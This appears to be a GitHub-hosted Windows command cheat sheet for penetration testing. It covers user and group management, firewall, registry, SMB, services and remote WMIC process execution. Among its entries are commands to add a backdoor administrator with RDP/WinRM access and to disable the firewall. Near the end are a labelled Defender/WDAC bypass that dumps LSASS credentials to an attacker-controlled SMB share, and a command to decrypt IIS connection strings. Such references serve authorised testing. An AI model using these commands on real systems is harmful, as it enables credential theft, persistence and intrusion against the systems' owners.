-
Notifications
You must be signed in to change notification settings - Fork 0
/
windows.cheat
150 lines (99 loc) · 3.33 KB
/
windows.cheat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
% windows
# Search for a string within a file
type <file> | find /i "<string>"
# Search for a regexp within a file
type <file> | findstr "<regexp>"
% windows, group
# list local users
net user
# list local users
net localgroup
# list group account
net localgroup <group>
# Create user, add it to admin group, winrm group and rdp group for remote gui (winrm/rdp) access
net user <name> <pass> /add
net localgroup Administrators <name> /add
net localgroup "Remote Management Users" <name> /add
net localgroup "Remote Desktop Users" <name> /add
# Add a user
net user <logon_name> <pass> /add
# Put user in a group
net localgroup <group> <user> /add
# Remove user from group
net localgroup <group> <user> /del
# Del a user
net user <logon_name> /del
% windows, firewall
# See whole firewall config
netsh advfirewall show allprofiles
# Delete firewall rule
netsh advfirewall firewall del <rule> name="<Comment>"
# Disable firewall
netsh advfirewall set allprofiles state off
# show all forwarded port
netsh interface portproxy show all
# add a forward port
netsh interface portproxy add v4tov4 listenport=<lport> listenaddress=<lip> connectaddress=<cip> connectport=<cport>
# delete a port forward
netsh interface portproxy delete v4tov4 listenport=<lport> listenaddress=<lip>
% windows, registry
# Read a reg key
reg query <key>
# Read a reg key remotely
reg query \\<target> <key>
# Change a key
reg add <keyname> /v <valuename> /t <type> /d <data>
% windows, smb
# Set up a sesion with a target
net use \\<target> <password> /u:<user>
# Mount a target share
net use * \\<target>\share <pass> /u:<user>
# Mount a target share (aternative)
net use * \\<target>\share <pass> /u:<machinename_or_domain>\<user>
# Delt smb session
net use \\<target> /del
# Drop all smb session
net use * /del
% windows, service
# List running services
sc query
# via wmic
wmic service where (displayname like "%<pattern>%") get name
# List running services remotely
sc \\<target> query
# List all services
sc query state= all
# Details for a service
sc query <name>
# show service permission (Security Descriptors show)
sc sdshow <service>
# start a service
sc start <name>
# enable service
sc config <name> start= demand
# stop a service
sc stop <name>
% windows, exec, command, process
# exec command with wmic
wmic /node:<target> /user:<admin_user> /password:<pass> process call create <cmd>
# list process on target
wmic /node:<target> /user:<admin_user> /password:<pass> process list brief
# Kill process on target by pid
wmic /node:<target> /user:<admin_user> /password:<pass> process where porcessid="<pid>" delete
# Kill process on target by name
wmic /node:<target> /user:<admin_user> /password:<pass> process where name="<name>" delete
% windows, env
# whoami
set <user>
# show path for commands to run
set path
% windows, find, search
# basic search
dir /b /s <dir>\<file>
# Find file from systemroot
dir /b /s %systemroot%\<file>
# Bypass WDAC Defender to execute lsass dump without touching disk
New-PSDrive -Name "X" -PSProvider "FileSystem" -Root "\\smbserver_under_your_control\c$"
powershell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id x:\lassdump.bin full
# IIS decrypt connection strings inside files of IIS Web directory
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.ex e -pdf connectionStrings C:\Inetpub\www\<dir>